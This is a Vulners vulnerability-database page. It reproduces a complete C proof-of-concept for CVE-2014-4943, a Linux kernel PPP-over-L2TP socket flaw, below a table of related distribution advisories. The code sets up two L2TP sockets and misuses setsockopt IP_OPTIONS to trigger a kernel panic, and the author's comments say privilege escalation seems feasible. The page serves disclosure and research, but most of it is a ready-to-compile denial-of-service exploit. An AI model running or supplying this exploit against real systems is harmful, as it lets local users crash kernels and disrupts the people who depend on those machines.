Vulners
Lucene search
Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC
| Reporter | Title | Published | Views | Family All 247 |
|---|---|---|---|---|
 | Exploit for Improper Privilege Management in Linux Linux_Kernel | 22 Nov 201513:58 | – | githubexploit |
 | CentOS 7 : kernel (CESA-2014:0923) | 26 Jul 201400:00 | – | nessus |
| CentOS 6 : kernel (CESA-2014:0924) | 26 Jul 201400:00 | – | nessus |
| Debian DLA-103-1 : linux-2.6 security update | 26 Mar 201500:00 | – | nessus |
| Debian DSA-2992-1 : linux - security update | 30 Jul 201400:00 | – | nessus |
| EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1481) | 13 May 201900:00 | – | nessus |
| Fedora 19 : kernel-3.14.13-100.fc19 (2014-8487) | 26 Jul 201400:00 | – | nessus |
| Fedora 20 : kernel-3.15.6-200.fc20 (2014-8519) | 21 Jul 201400:00 | – | nessus |
| Mandriva Linux Security Advisory : kernel (MDVSA-2014:155) | 8 Aug 201400:00 | – | nessus |
| MiracleLinux 4 : kernel-2.6.32-431.23.3.el6 (AXSA:2014-490:04) | 16 Jan 202600:00 | – | nessus |
10
/* ----------------------------------------------------------------------------------------------------
* cve-2014-4943_poc.c
*
* The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure
* differences between an l2tp socket and an inet socket.
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
* I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
* There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.
* If seems guys at immunuty found a way using race condition.
*
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/
/* ----------------------- Includes ----------------------------*/
#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>
/* ----------------------- Definitions ----------------------------*/
#define TARGET_KERNEL_MIN "3.2.0"
#define TARGET_KERNEL_MAX "3.15.6"
#define EXPLOIT_NAME "cve-2014-4943"
/* ----------------------- functions ----------------------------*/
/**
* It is possible to modify several parts of socket object using IP options frop UDP setsockopt
* For this POC, IP_OPTIONS is the easiest way to panic kernel
*/
void modifyUDPvalues(int tunnel_fd)
{
/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
int udp_setsockopt(struct sock *sk, int level, int optname,
char __user *optval, unsigned int optlen)
{
if (level == SOL_UDP || level == SOL_UDPLITE)
return udp_lib_setsockopt(sk, level, optname, optval, optlen,
udp_push_pending_frames);
return ip_setsockopt(sk, level, optname, optval, optlen);
}
*/
int ip_options = 0x1;
if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1)
{
perror("setsockopt (IP_OPTIONS)");
}
}
/**
* DOS poc for cve_2014_4943 vulnerability
*/
int main()
{
int tunnel_fd;
int tunnel_fd2;
int udp_fd;
printf("[cve_2014_4943]: Preparing to exploit.\n");
/* Create first L2TP socket */
tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (tunnel_fd < 0)
{
perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
return -1;
}
/* Create second L2TP socket */
tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (tunnel_fd2 < 0)
{
perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
return -1;
}
if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("cannot create socket");
return -1;
}
/* Connect LT2P socket */
struct sockaddr_pppol2tp sax;
memset(&sax, 0, sizeof(sax));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */
sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = 8;//tunnel_id;
sax.pppol2tp.s_session = 0; /* special case: mgmt socket */
sax.pppol2tp.d_tunnel = 0;
sax.pppol2tp.d_session = 0; /* special case: mgmt socket */
if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
{
perror("connect failed");
}
/* Connect LT2P socket */
struct sockaddr_pppol2tp sax2;
memset(&sax, 0, sizeof(sax2));
sax2.sa_family = AF_PPPOX;
sax2.sa_protocol = PX_PROTO_OL2TP;
sax2.pppol2tp.s_tunnel = 8;//tunnel_id;
sax2.pppol2tp.s_session = 1;
sax2.pppol2tp.d_tunnel = 0;
sax2.pppol2tp.d_session = 1;
if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
{
perror("connect failed");
}
/*
* Entering critical part
*/
printf("[cve_2014_4943]: Panic!\n");
//modifyUDPvalues(tunnel_fd);
modifyUDPvalues(tunnel_fd2);
// close opened socket
puts("\n [+] Closing sockets...");
close(tunnel_fd);
close(tunnel_fd2);
exit(0);
}
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2015 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.01034